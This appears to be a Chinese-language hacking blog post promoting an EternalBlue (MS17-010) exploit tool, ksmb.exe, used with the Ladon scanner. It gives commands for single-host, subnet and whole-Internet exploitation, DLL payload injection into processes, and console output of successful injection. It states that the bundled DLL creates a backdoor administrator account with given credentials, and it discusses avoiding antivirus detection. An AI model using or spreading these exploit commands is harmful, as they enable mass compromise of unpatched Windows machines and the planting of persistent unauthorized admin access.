漏洞簡介
永恆之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公佈一大批網絡攻擊工具,其中包含“永恆之藍”工具,“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高權限。5月12日,不法分子通過改造“永恆之藍”製作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復文件。
漏洞檢測
無損檢測,不會對目標造成任何危害,大家無需擔心
Ladon 192.168.1.8 MS17010
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/c MS17010
檢測發現存在漏洞高亮顯示
獨立使用
只需提供IP或IP列表即可自動利用永恆之藍,當然也可以使用Ladon來批量甚至全網
PS: 由於當時漏洞影響很大,所以並未放出一鍵批量工具,現在4年過去了,還沒打補丁就只能建議開除維護人員了,工具調用的是NSA原版的EXP,所以整個SMBSCAN目錄裏的文件基本上都是被殺的,這就不方便集成在Ladon裏,以免Ladon被所有殺軟殺。
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege
IP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
只IP默認445端口
ksmb 192.168.1.89
自定義端口
ksmb 192.168.1.89 445
適用於代理出來打,不用考慮做免殺,而且免殺一堆文件也很麻煩
自定義DLL
ksmb 192.168.1.89 445 mydll.dll
注入指定進程
ksmb 192.168.1.89 445 mydll.dll explorer.exe
Ladon調用
使用Ladon可輕鬆批量使用自己的POC,即只需要實現一個功能,剩下交給Ladon,不用每次來什麼新洞都得浪費時間寫批量利用工具。除了花一堆時間調式EXP,還得把它弄成批量,批量又得考慮多線程是否兼容POC裏的代碼等等問題,等寫完時效性都過了。Ladon可批量主機、批量URL、批量網段、全網等等,非常方便,下面就是調用ms17010exp的例子。
C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0 ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804 CurrentProcess: Ladon
Call DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89 00-0C-29-CF-FE-E1 VMware
MS17010-EXP ETERNALBLUE by K8gege
IP: 192.168.1.89
OS: 64-bit 6.1 build 7601 Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE - DANE ETERNALROMANCE - FB ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
批量利用
Ladon 192.168.1.89/c ksmb.exe
Ladon 192.168.1.89/24 ksmb.exe
全網掃描
Ladon 0.0.0.0-255.255.255.255 ksmb.exe
成功結果
自帶DLL會添加以下管理員用戶
k8ms17010exp K8gege520!@#
可替換DLL,執行自定義功能
下載
EXP小密圈內下載